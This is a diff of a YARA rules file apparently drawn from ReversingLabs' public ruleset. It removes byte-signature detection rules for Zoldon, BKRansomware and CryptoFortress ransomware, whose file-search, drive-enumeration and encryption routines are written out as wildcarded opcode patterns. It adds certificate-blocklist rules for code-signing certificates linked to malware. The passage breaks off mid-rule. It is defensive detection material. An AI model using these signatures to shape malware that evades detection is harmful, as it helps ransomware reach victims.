-            ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? 33
-            C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
-        }
-		$find_files_p1 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D ?? ?? ??
-            ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 55 ??
-            89 45 ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ??
-            64 FF 30 64 89 20 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33
-            C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45
-            ?? 80 B8 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
-            74 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ??
-            ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10
-            68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 8B
-        }
-		$find_files_p2 = {
-            8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E9
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? B9 ??
-            ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? E9 ?? ??
-            ?? ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D
-            55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ??
-            ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ??
-            ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D
-            55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ??
-            ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ??
-            ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            85 C0 0F 84 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $write_zoldon_regkey ) and ( all of ( $find_files_p* ) ) and ( all of ( $main_encrypt_function_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "73:e2:f3:4c:9c:24:35:f2:9b:be:0a:3c" and 1480312984 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Bkransomware : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_68C457D7495D2A8D0D7B9042836135C2 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects BKRansomware ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "88dc5c4a-046a-52e2-b108-0a90b91d4fb6"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "a8ed2e72-d94e-5141-8ceb-181459a729ad"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.BKRansomware.yara#L1-L79"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13422-L13438"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3118098f05a13bd161af0cb1ec322878b371ff70b9f3815a04115a214c0965a2"
+		logic_hash = "3eb63f75f258eec611fa4288302f0ce5e47149ca876265a4a4b65dc33313aaa6"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "BKRansomware"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_files = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B F9 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ??
-            57 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? EB ?? 8D A4 24 ?? ?? ?? ?? 90
-            8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ??
-            8B B5 ?? ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B
-            10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66
-            85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 74 ?? B8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            66 8B 11 66 3B 10 75 ?? 66 85 D2 74 ?? 66 8B 51 ?? 66 3B 50 ?? 75 ?? 83 C1 ?? 83 C0
-            ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 57 8D
-            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 83 FE ?? 74 ??
-            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ??
-            50 57 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53
-            FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 57 6A ?? 68
-            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B F9 68 ?? ?? ?? ?? 57 89 BD ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 56 6A ?? 53 FF 15 ?? ?? ??
-            ?? 8B F0 68 ?? ?? ?? ?? 57 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ??
-            ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85
-            C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ??
-            ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ??
-            57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85
-            C0 75 ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 F6 0F 8E ?? ?? ?? ?? 33
-        }
-		$encrypt_files_p2 = {
-            FF 8D 49 ?? 6A ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 68 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? 33 F6 8D 51 ?? EB ?? 8D 49 ?? 8A 01 41 84 C0 75 ?? 2B CA 74 ?? BB ?? ?? ?? ??
-            8A 84 35 ?? ?? ?? ?? 3C ?? 7C ?? 3C ?? 7F ?? 0F BE C0 83 E8 ?? 99 F7 FB 80 C2 ?? EB
-            ?? 3C ?? 7C ?? 3C ?? 7F ?? 0F BE C0 83 E8 ?? 99 F7 FB 80 C2 ?? 88 94 35 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 46 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 3B F0 72 ?? 8B 9D ?? ?? ??
-            ?? 6A ?? 6A ?? 57 53 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8D 9B ?? ?? ?? ??
-            8A 01 41 84 C0 75 ?? 6A ?? 8D 85 ?? ?? ?? ?? 2B CA 50 51 8D 85 ?? ?? ?? ?? 50 53 FF
-            15 ?? ?? ?? ?? 03 BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 3B BD ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 53 FF 15 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ??
-            5E 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $search_files ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "68:c4:57:d7:49:5d:2a:8d:0d:7b:90:42:83:61:35:c2" and 1476921600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Cryptofortress : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6B72Ca367D40Fbef16E73E6Eba6A9A59 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects CryptoFortress ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "460289b1-f775-5e0b-8c44-4f6e5c92da60"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "e1cf9568-9a6a-58cb-81a4-25063ccc1ac7"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.CryptoFortress.yara#L1-L162"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13440-L13456"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "474893b63523de5ff9eb8a0c91b0677b99ce65056af7f5d02a73e43fa65453c9"
+		logic_hash = "2b20c16dafcd891c36b28b36093cd3ad3a15f3795f0f2adda61fb0db2835d02d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "CryptoFortress"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$enum_drives = {
-            55 8B EC 83 C4 ?? 56 57 C7 45 ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 8D 7D ?? B2 ?? B9 ?? ?? ?? ?? A9 ?? ?? ?? ?? 74 ?? 88 17 47 D1 E8 FE C2 49
-            75 ?? C6 07 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B F8 8D 75 ?? 8A 16 88 55 ?? 8D 45 ?? 50
-            FF 15 ?? ?? ?? ?? 8D 55 ?? C6 42 ?? ?? 83 F8 ?? 75 ?? 60 8D 45 ?? 50 8D 45 ?? 50 6A
-            ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ??
-            50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 05 ?? ?? ?? ?? 61 46 4F 75 ?? A1 ?? ?? ?? ?? A3
-            ?? ?? ?? ?? A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 5F 5E C9 C3
-        }
-		$enum_shared_resources = {
-            55 8B EC 83 C4 ?? 8D 45 ?? 50 FF 75 ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 0B C0 0F
-            85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? 8D 45 ?? 50 FF 75 ?? FF 15
-            ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 3D ?? ?? ?? ?? 74 ?? 8B 4D ?? 51 8D 49 ?? 6B C9 ?? 8B
-            45 ?? 8D 0C 01 6A ?? 51 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? FF 75 ?? E8 ??
-            ?? ?? ?? 83 F8 ?? 76 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            0B C0 74 ?? FF 75 ?? E8 ?? ?? ?? ?? EB ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 49 75 ?? EB
-            ?? EB ?? E9 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? FF
-            15 ?? ?? ?? ?? C9 C2
-        }
-		$find_files = {
-            55 8B EC 81 C4 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF 35
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85
-            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 40 0F 84 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            83 E0 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
-            0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ??
-            ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? C6 00 ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? C6 00 ?? 2B 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            8D ?? ?? ?? ?? C7 04 08 ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 8B 8D ?? ?? ?? ?? C7 44 08 ??
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
-            0F 84 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF B5 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F
-            85 ?? ?? ?? ?? 8B 4D ?? 0B C9 75 ?? 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 45 ??
-            8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 49 8B 1D ?? ?? ?? ?? 51 53
-            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 59 EB ?? 53 E8 ?? ?? ?? ?? 03 D8
-            83 C3 ?? 59 E2 ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 8B 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 0B
-            C9 75 ?? 3B D0 72 ?? EB ?? EB ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 75 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF B5
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF B5
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C9 C3
-        }
-		$encrypt_files = {
-            55 8B EC 83 C4 ?? 53 33 C0 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89
-            45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? FF 35 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 89 45 ?? FF 75 ?? E8 ?? ?? ?? ?? 33 C0 50 50 6A ?? 50 6A ?? 68 ?? ?? ?? ??
-            FF 75 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? E9 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 8D 45
-            ?? 50 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ??
-            83 7D ?? ?? 75 ?? 83 7D ?? ?? 73 ?? E9 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? BB ?? ?? ?? ??
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? BB ?? ?? ?? ?? B8
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B D2 75 ?? 0B C9 75 ?? B9 ?? ?? ?? ?? 89 4D ?? 89 55 ??
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 4D ?? 89 55 ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 89 4D ?? 89 55 ?? 0B DB 75 ?? 0B C0 74 ?? 83 45 ?? ?? 83 55 ?? ?? FF 75 ??
-            FF 75 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 81 7D ?? ?? ??
-            ?? ?? 76 ?? B8 ?? ?? ?? ?? EB ?? 8B 45 ?? 6B C0 ?? 89 45 ?? 6A ?? 8D 45 ?? 50 FF 75
-            ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? 0B C0 74 ?? E9 ?? ?? ?? ??
-            6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? 6A ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? E8 ?? ??
-            ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? 0B C0 74 ?? E9 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF
-            75 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? DF 6D ?? DA 45
-            ?? DF 7D ?? C7 45 ?? ?? ?? ?? ?? DF 6D ?? DA 65 ?? DF 7D ?? C7 45 ?? ?? ?? ?? ?? DF
-            6D ?? DA 65 ?? DF 7D ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 74 ?? E9 ?? ?? ?? ?? 8F 45 ??
-            8F 45 ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ??
-            ?? ?? 0B C0 74 ?? EB ?? 6A ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ??
-            ?? 0B C0 75 ?? EB ?? 6A ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ??
-            ?? 0B C0 75 ?? EB ?? EB ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ?? 50 FF 75 ?? FF 15 ?? ??
-            ?? ?? FF 75 ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ??
-            50 FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5B C9 C2
-        }
-		$read_config_file = {
-            55 8B EC 83 C4 ?? [0-20] 6A ?? 68 ?? ?? ?? ?? 6A
-            ?? (E8 | FF 15) ?? ?? ?? ?? 0B C0 75 ?? 33 C0 C9
-            C3 89 45 ?? 50 6A ?? (E8 | FF 15) ?? ?? ?? ?? 0B
-            C0 75 04 33 C0 C9 C3 89 45 ?? FF 75 ?? 6A ??
-            (E8 | FF 15) ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3
-            89 45 ?? 50 (E8 | FF 15) ?? ?? ?? ?? 0B C0 75 04
-            33 C0 C9 C3 89 45 ?? FF 75 ?? 6A ?? (E8 | FF 15)
-            ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 89 45 ?? 8B
-            D8 FF 75 ?? FF 75 ?? FF 75 ?? (E8 | FF 15) ?? ??
-            ?? ?? FF 75 ?? (E8 | FF 15) ?? ?? ?? ?? 8B 5D ??
-            6A ?? 53 68 ?? ?? ?? ?? (E8 | FF 15) ?? ?? ?? ??
-            83 C3 ?? 8B 45 ?? 83 (E8 | FF 15) ?? 50 53
-            (E8 | FF 15) ?? ?? ?? ?? 8A 03 A2 ?? ?? ?? ?? 83
-            C3 ?? 8A 03 A2 ?? ?? ?? ?? 83 C3
-        }
-		$file_type_loop = {
-            51 53 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8
-            ?? 75 03 59 EB ?? 53 E8 ?? ?? ?? ?? 03 D8 83 C3
-            ?? 59 E2 DC [20-40] FF B5 ?? ?? ?? ?? FF B5 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 0B C0 75 44 FF B5 ?? ?? ?? ?? FF B5 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF B5
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF
-            B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0
-            0F 85
-        }
-		$encrypt_routine = {
-            FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ??
